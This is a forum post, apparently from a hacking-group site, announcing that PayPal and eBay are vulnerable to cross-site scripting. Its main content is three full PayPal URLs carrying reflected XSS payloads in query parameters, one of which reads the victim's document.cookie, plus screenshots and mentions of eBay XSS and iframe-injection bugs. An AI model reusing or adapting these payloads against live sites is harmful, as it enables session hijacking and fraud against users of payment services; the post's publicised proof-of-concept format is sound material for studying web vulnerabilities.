Nemesis Our Projects Forums Extra Controls
  RegMe



PAYPAL and EBAY still Vulnerable to XSS



Neglecting Security practices became a TRADITION for them!

Paypal.com  - XSS  

http://img29.imageshack.us/img29/1008/t1hdrsecurityctr760x156.jpg

Code:
http://www.paypal.com/en_US/html/MerchantServices/question.html?step=2&paymentMethodWeb=on&volume="><script>alert(document.cookie)</script>


http://img32.imageshack.us/img32/6958/paym.jpg

Code:
http://www.paypal.com/en_US/html/MerchantServices/question.html?step=2&paymentMethodWeb="><script>alert(String.fromCharCode(88,83,83))</script>


http://img32.imageshack.us/img32/3664/26495878.jpg

Code:
http://www.paypal.com/en_US/html/MerchantServices/question.html?step=5&volume="><script>alert(String.fromCharCode(88,83,83))</script>
   

http://img140.imageshack.us/img140/4640/123cvy.gif

A few days ago I have reported other XSS bugs on PayPal and still, new bugs can be found without even looking too hard.

See also :- PayPal again vulnerable to XSS

Ebay  - XSS and Iframe injection

Bugs on search module.

http://img155.imageshack.us/img155/9523/ebay2d.jpg

http://img155.imageshack.us/img155/2396/ebaym.jpg   

See also:-

Spanish Ebay Vulnerable to XSS

Multiple Bugs On EBAY.CO.UK Website


Submitted by [-TE-]-Methodman


No Comments


You need to be logged in to be able to post comments